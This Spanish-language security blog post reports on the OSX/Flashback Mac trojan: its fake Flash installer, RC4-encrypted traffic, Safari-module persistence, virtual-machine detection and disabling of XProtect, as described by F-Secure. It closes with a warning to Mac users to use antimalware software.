El truco elegido inicialmente ha sido simular ser la instalación de Adobe Flash en Mac OS X, algo bastante sencillo y fácil de mutar. Así que, cuando los usarios de Mac OS X tengan cuidado con los archivos de instalación de Flash, les basta con cambiar el programa y listo. Así, es posible que aparezcan como si fuera cualquier archivo descompresor, el tan usado truco de los codecs de vídeo o cualquier otra utilireía de mensajería instantanea. El cielo es el límite.

Ahora bien, donde realmente están haciendo foco es en la tecnología que hay en el troyano una vez se hace clic en aceptar la instalación. En ese punto, las diferentes mutaciones (ahora se habla de OSX/Flashback.C) han mostrado auténtica ingeniería de desarrollo de malware. Primero vimos que OSX/Flashback utilizaba sistemas de comunicación cifrados en RC4, para evitar cualquier IDS de red que pudiera detectarlo, además de forma bastante cuirosa, ya que la clave de cifrado utilizada era única por cada equipo (un hash MD5 del UUID del equipo) y se enviaba en el campo User-Agent de una petición http, para intentar ir bien oculta.

Después, se ha visto como una vez instalado, ha pasado de estar a la vista, a acoplarse como un módulo de Apple Safari, lo que hace mucho más complicado para los usuarios menos avanzados darse cuenta de que algo pasa.

En otra de las mutaciones, la gente de F-Secure alertaba de que una mutación de este malware, OSX/Flashback.B, venía con capacidades para detectar las máquinas virtuales, algo muy utilizado por los analistas de malware. De esta manera, los equipos que estén a cargo de analizar esta pieza de software tienen que hacer un reversing con el software "callado", lo que dificulta mucho el conocer el comportamiento, y obliga a pegarse con packers y crypters de código. En Windows, esta protección anti-análisis es muy común, pero esta es la primera vez que se ha visto en un malware para Mac OS X.

La última de las novedades que se ha hecho pública de este software ha sido la de anular XProtect. Anulando XProtect en un equipo con Mac OS X, se anula la posibilidad de que el sistema se defienda con nuevas firmas, lo que hace que el malware campe a sus anchas en todas las máquinas infectadas y que, en caso de ser eliminado, si no se arregla el funcionamiento de XProtect, incluso las copias firmadas por Apple de OSX/FlashBack podrían volver a infectar al usuario.

Para hacerlo, tal y como explican en F-Secure, lo que hace es descifrar la ruta de almacenamiento de XProtectUploader, para sobre-escribir el fichero de configuración Plist y el binario del actualizador.

Decompilación de F-Secure sobre OSX/Flashback.C
Evidentemente, como ya explicamos, XProtect no es una solución antimalware profesional, y se basa solo en un reducido conjunto de firmas que actúan como blacklist cuando un fichero se descarga desde Internet, pero que no tiene análisis heurísticos, en tiempo real ni protecciones contra deshabilitación, como hacen los antimalware profesionales. Si tienes un Mac OS X y has oido eso de que no hay que tener una solución profesional antimalware en el equipo, ya es hora de que empieces a preocuparte por lo que se nos viene encima.
Artículos relacionados

Otras historias relacionadas

Entradas populares